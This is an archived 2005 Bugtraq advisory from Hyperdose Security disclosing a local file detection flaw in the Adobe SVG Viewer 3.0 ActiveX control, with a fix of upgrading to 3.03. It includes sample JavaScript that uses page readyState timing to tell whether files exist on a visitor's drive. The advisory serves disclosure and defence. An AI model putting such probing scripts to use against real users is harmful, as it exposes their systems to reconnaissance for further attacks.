lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 4 May 2005 08:37:37 -0700
From: "Hyperdose Security" <robfly@...erdose.com>
To: <bugtraq@...urityfocus.com>
Subject: Local file detection bug found through Adobe SVG Viewer


Hyperdose Security Advisory

Name: Local file detection bug found through Adobe SVG Viewer
Systems Affected: v3.0 (unclear if earlier versions were affected)
Severity: Low
Author: Robert Fly - robfly@...erdose.com
Advisory URL: http://www.hyperdose.com/advisories/H2005-07.txt

--Adobe Description--
From Adobe.com, "Adobe helps people and businesses communicate better
through its world-leading digital imaging, design, and document technology
platforms for consumers, creative professionals, and enterprises.".

--Bug Details--
Adobe SVG Viewer contains a Safe for Scripting ActiveX control (file
NPSVG3.dll).  The control contains a property named 'src'.  When 'src' is
set to a file that does exist, the web page will stop loading immediately.
If 'src' is set to a file that does not exist the page will continue to load
(specifically readystate will not hit the complete state).  Using this trick
a little bit of javascript can be used to determine if local files exist on
a users hard drive.  Knowing the existence of files can be a stepping stone
for further attacks.

Proof of concept: http://www.hyperdose.com/exploits/AdobeSVG.html
Sample Javascript:
function load(filename)
{
	//foo is reference to SVG ActiveX control, filename is the filename
you're looking for
	foo.src = filename;  
	setTimeout("loading()", 5000);
}

function loading()
{
	if (document.readyState != 'complete')
	{
		alert('File does not exist.');
	}
	else
	{
		alert('File exists.');
	}
	window.location.reload(false);
}


This bug is very similar to Hyperdose's last advisory on Adobe
(http://www.hyperdose.com/advisories/H2005-06.txt).  The exploit mechanism
for this one though is more interesting.  Be aware of timing based attacks.
If you pay attention, they're out there.

--Fix Information--
Upgrade to version 3.03.  
Details from Adobe found here:
http://www.adobe.com/svg/viewer/install/mainframed.html

--About Hyperdose--
Hyperdose Security was founded to provide companies with application
security knowledge through all parts of an application's security
development lifecycle.  We specialize in all phases of software development
ranging from security design and architectural reviews, security code
reviews and penetration testing.

web   www.hyperdose.com 
email robfly@...erdose.com





Powered by blists - more mailing lists